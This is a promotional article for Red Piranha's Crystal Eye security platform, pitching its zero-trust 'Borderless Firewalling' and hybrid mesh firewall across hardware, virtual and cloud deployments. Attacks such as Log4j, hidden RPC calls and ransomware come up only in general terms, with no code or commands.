Today’s networks are increasingly abstracted from the fibre and copper they run on. What constitutes a corporate network is no longer the buildings they reside in, nor the number of remote workers that connect daily. Network traffic is evolving to become processed as streaming workflow, and any given activity has numerous tributaries that flow along ever more complex pathways. Microservices for example, are software functions that aggregate to form the service that is presented to the user.
What looks like old code, is in fact many different components working from without the traditional network perimeter. What was once a picture of a Medieval castle, with workers coming and going through gatehouses, has merged into a surrealist overlay of bodies and places.
The problem this presents though is not that there is too much information to decode the traffic, the problem is that the traffic has different modes in which it can traverse a network. Linear rules that determine who-goes-there, can’t keep pace with the great many assassins in shepherd’s clothing.
The Strategic Value of Zero Trust Security Models
So as perimeter-based security depreciates a new geography of Zero Trust emerges. Ingress from anywhere, and egress to anywhere, passes through this space, which is a security defined control plane abstracted from network traffic. Filtering at the perimeter now involves algorithms that oversee a lake of data.
This way, policy administration is brought as close to the action as possible. With Crystal Eye platform, workflow is traced, marked and checked against entity behaviour analytics, the integrated risk registry and policies, as well as dynamic policy resulting from threat intelligence. At the data plane, over thirty-two hundred protocols can be processed out-of-the-box, while customisable protocol parsing supports bespoke Industrial Control Systems (ICS), including SCADA, and other IoT devices. This gives granular, but also contextual control over authentication and authorisation so that both human and non-human subjects receive least privileges on a per-transaction basis.
Borderless Firewalling: Enforcement at Every Edge
Borderless Firewalling then, takes place at enforcement points, be they clients or servers, network gateways, or cloud brokering points. The Crystal Eye Attack Surface Reduction app (CEASR) is an example of a host-based point at which Zero Trust policy is enforced. While Crystal Eye Hybrid Mesh Firewall extends firewalling to on-premises gateways, cloud-native gateways, and brokering points.
Network segmentation also creates enforcement points between zones, and when interconnected by an SD-WAN, the use of new protocols like WireGuard as a Software Defined Perimeter (SDP) controller, provides hybrid architecture access to brokered resources rather than directly joining networks.
Without embracing the Zero Trust paradigm, Next-Generation firewalls are as dead as disco. Many require add-ons to do so, but as a module within the Security Platform, the CE firewall achieves borderless latitude outright with its proprietary UCMI technology, as policy enforcement, the act of firewalling, will need to continue doing so around more and more corners.
Hybrid Mesh Firewall: The Security Reality
The architecture described so far is not new to Red Piranha, but the industry has only lately agreed on what to call it. Where this article speaks of Borderless Firewalling, analysts now speak of the Hybrid Mesh Firewall: a single security architecture that abandons the one-box-at-the-gate model in favour of many cooperating enforcement points, drawn together by a shared control plane and one common policy framework.
A firewall is no longer a place that traffic passes through; it is a property of the whole network, present wherever traffic is created, brokered or consumed.
What separates a Hybrid Mesh Firewall from a next-generation firewall wearing a few cloud add-ons is consistency. Every enforcement point; a branch appliance, a virtualised data centre, a cloud broker, a remote endpoint must run the same inspection engine, answer to the same policy, and contribute to one shared pool of evidence.
Anything less reintroduces the seams that intruders have always been good at finding. Crystal Eye was built to this principle before the principle had a name; engineered as a single platform from the outset, rather than a perimeter product later stretched to reach the cloud.
One Platform, Every Edge: Three Form Factors
Crystal Eye is delivered in three form factors. Each carries the identical feature set, the same IDPS ruleset, and the same management console, so a policy written once behaves the same wherever traffic meets it.
- Hardware appliance. Purpose-built, made-to-order units spanning the Series 10 to Series 100 range, from small branch to carrier-grade. A single 2U device sustains 60 Gbps of IPS throughput; with active/passive high availability for failover that costs no downtime.
- Virtual appliance. The complete platform delivered as software for VMware, Hyper-V and KVM environments, with full feature parity to hardware and no capability surrendered for the convenience. Sizing is flexible for data-centre and branch virtualisation, and provisioning is API-driven for lifecycle automation.
- Cloud and FWaaS. Cloud-native enforcement through Crystal Eye Cloud and SASE Cloud, with multiple global points of presence, native AWS VPC integration, and Microsoft Entra ID (formerly Azure AD) identity-aware policy reaching into OneDrive, SharePoint and Exchange. This is where Zero Trust extends to microservices and the remote workforce.
Because the three are one platform rather than three products, an organisation can place enforcement wherever its traffic actually lives and move it as that picture changes without re-learning a console or accepting a thinner ruleset at whichever edge happened to be cheapest to deploy.
Crystal Eye Orchestrate: The Unified Control Plane
Enforcement spread across many points only works if something holds the whole picture together. That something is Crystal Eye Orchestrate, a cloud-delivered management plane that sits above every hardware, virtual and cloud deployment at once.
It is the control plane this article described in the abstract policy administration brought as close to the action as possible, while remaining a single vantage point rather than a scattering of local consoles.
Orchestrate is a data lake in its own right, correlating events from every enforcement point and driving multi-tenant orchestration for MSP and MSSP partners. At its core is UCMI Object Policy Control, which manages services, hosts and domains simultaneously across every countermeasure.
The practical result is the elimination of policy drift; the slow divergence between what the on-premise gateway enforces, what the cloud gateway enforces, and what the remote endpoint enforces; which is one of the quieter ways a borderless network is breached. One object, changed once, takes effect everywhere.
The detection behind those policies is substantial. The IDPS engine uses more than 80,000 professionally curated rules, updated daily by the Crystal Eye Security Operations Centre. Red Piranha also feeds Automated Actionable Intelligence directly into enforcement controls. This includes DNS-layer threat blocking, SSL/TLS deep packet inspection, and real time discovery of IoT and cyber-physical devices, each with its own policy framework.
Integrated SOAR automatically handles low-risk events and escalates critical incidents for human and machine collaboration. At the same time, the DFIR application allows forensic investigations to begin directly within the platform, without switching tools.
Policing the Data Lake
Meanwhile, wayward activities within the data lake are what attract alerts, as coastguard like policy administration inspects session-specific tokens permitting passage. The wrong payload, flag, or heading will impound traffic at an enforcement point.
With the appropriate Security Platform, vulnerabilities like Log4j are not as easily exploited. Injected JNDI lookups would never reach attacker-controlled servers to retrieve malicious subroutines. What would otherwise have been a trusted service can no longer further the installation and backdoor phases of the kill chain.
One Policy Engine, Many Inputs
The challenge for detecting incursions though is as they ever were. Logs and traffic can still be disguised. Which is why extended detection inputs that form a policy engine must be unified. Red Piranha’s proprietary UCMI policy controller achieves this as the central hub that corelates forensic evidence ingested by continuous diagnostics systems.
Indicators of Compromise (IOCs) are analysed against Tactics, Techniques, and Procedures (TTPs), as well as User and Entity Behaviour Analytics (UEBA) to produce a complex security mesh that tracks distributed workflow. What this means is that there are checks and balances applied to the bureaucracy that is the network-aware systems of today.
Catching What Hides in the Payload
As a fundamental function of this apparatus, Remote Procedure Calls (RPCs) follow protocols that facilitate the execution of routines on remote systems. Yet these requests between machines are effectively disguised by stub compliers that unpackage arguments parsed by the remote system. That system then is unaware, and logs activity as its own.
This missing trace at end points is compounded when RPC calls are hidden within the payload of other protocols, like named pipes that carry common traffic, or are obfuscated and delivered out of order. So, to catch this activity, multiple points of detection are required. Verifying identity and access becomes more about whether the activity is typical and what supports that conclusion. Activity is checked against known techniques, as well as indicators like compromised addresses, domains and file hashes. Correlation occurs across the entire lake of activity and not just what is evident in a single transaction.
Cybersecurity Mesh by Design
The security mesh invoked earlier in this article is not a metaphor reached for after the fact; it is the design. Gartner’s Cybersecurity Mesh Architecture calls for a composable model in which enforcement is distributed while data and control stay centralised; and Crystal Eye’s architecture pre-dates that definition rather than chasing it.
The below architecture shows how hybrid mesh firewall delivers: hardware appliances at headquarters, branches and data centres; cloud and FWaaS enforcement across AWS, Azure and the Crystal Eye SASE Cloud; and a remote workforce reached through ZTNA, SD-WAN and the CEASR endpoint application; every part a composable module, every part answering to one Orchestrate data and control plane.
Crystal Eye Cybersecurity Mesh: distributed enforcement, one central data and control plane.
Within that mesh sit the platform’s integrated capabilities; NGFW with IPS and IDS, Crystal Eye Threat Detection, Investigation and Response across network and endpoint, SIEM and SOAR, DFIR, secure web and email gateways, DLP, SD-WAN, ZTNA, DNS security and IoT discovery not as point products bolted together, but as functions of one platform drawing on a single store of evidence.
That common evidence base is what makes the correlation the earlier sections relied upon possible: a signal seen at a cloud broker can shape an enforcement decision on a branch appliance, because both are the same firewall in different clothes.
From Initial Vector to Wire-Speed Response
Spotting calls to ransomware command servers will prevent obtaining the private keys they need to hold data hostage. But, when private keys are symmetrically encrypted and smuggled in the original delivery, Zero Trust must be applied to prevent lateral movement and privilege escalation spreading from within.
This can be implemented with Crystal Eye Hybrid Mesh Firewall capabilities with UCMI and hosts and zones linked to end users. Halting incursions at that initial attack vector is crucial to countermeasures in an open field ungoverned by perimeter rules. The ability to materialise at key locations is Borderless Firewalling.
This requires continuous detection across the entire lake of data that extends to the entire security mesh. With the Crystal Eye Security Platform and SOC (SOC-as-a-Service) in place, the necessary intelligence can be passed to the Crystal Eye at wire speed, turning a lowly grunt in the hierarchy of threat detection into that unsung responder who saves the day.
The perimeter is not coming back. Security can no longer be a place that traffic simply passes through. It now has to exist across the entire network, present at every edge at once.
That is what Borderless Firewalling has always described, and what now the Hybrid Mesh Firewall demands. For organisations, the question is no longer whether to adopt this model, but how to do so without creating gaps by stitching multiple point products together.
Crystal Eye addresses this with a single platform approach. The same inspection engine and policy framework operate across hardware, virtual, and cloud deployments, all unified through the Orchestrate control plane and one shared evidence store.
The result is consistent enforcement wherever workflow travels, correlation across the entire security mesh, and threat intelligence delivered to the firewall at wire speed. That is the strength of the Crystal Eye Hybrid Mesh Firewall: borderless reach with no seams left to exploit.